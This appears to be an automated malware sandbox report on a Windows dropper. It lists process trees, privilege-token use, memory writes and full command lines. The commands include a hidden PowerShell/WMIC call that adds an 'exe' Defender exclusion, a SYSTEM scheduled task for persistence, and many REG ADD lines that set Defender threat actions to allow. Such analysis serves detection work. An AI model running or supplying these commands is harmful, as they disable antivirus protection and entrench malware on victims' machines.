N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A
N/A N/A C:\Windows\Temp\JHEwijpMlSQrgvQB\pYfKFPLgxLIWjmS\ULqDaEV.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1080 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe
PID 1080 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe
PID 1080 wrote to memory of 3880 N/A C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe
PID 3880 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3880 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 3880 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\forfiles.exe
PID 4348 wrote to memory of 1544 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4348 wrote to memory of 1544 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 4348 wrote to memory of 1544 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1544 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1544 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1544 wrote to memory of 2612 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2612 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 2612 wrote to memory of 3300 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\Wbem\WMIC.exe
PID 3880 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3880 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 3880 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe C:\Windows\SysWOW64\schtasks.exe
PID 4636 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4636 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4636 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2120 wrote to memory of 4296 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 4296 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2120 wrote to memory of 4296 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4296 wrote to memory of 2004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4296 wrote to memory of 2004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4296 wrote to memory of 2004 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 736 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3968 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2844 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3604 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3116 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 2420 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Conhost.exe
PID 2120 wrote to memory of 2420 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Conhost.exe
PID 2120 wrote to memory of 2420 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\Conhost.exe
PID 2120 wrote to memory of 1820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1820 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 1548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3608 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 5044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4552 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4552 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4552 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 4376 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe
PID 2120 wrote to memory of 3464 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe

"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"

C:\Users\Admin\AppData\Local\Temp\7zS3662.tmp\Install.exe

.\Install.exe /AdidysikD "385118" /S

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe\" Oz /Lssite_idCpU 385118 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe

C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\ENTxXds.exe Oz /Lssite_idCpU 385118 /S

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

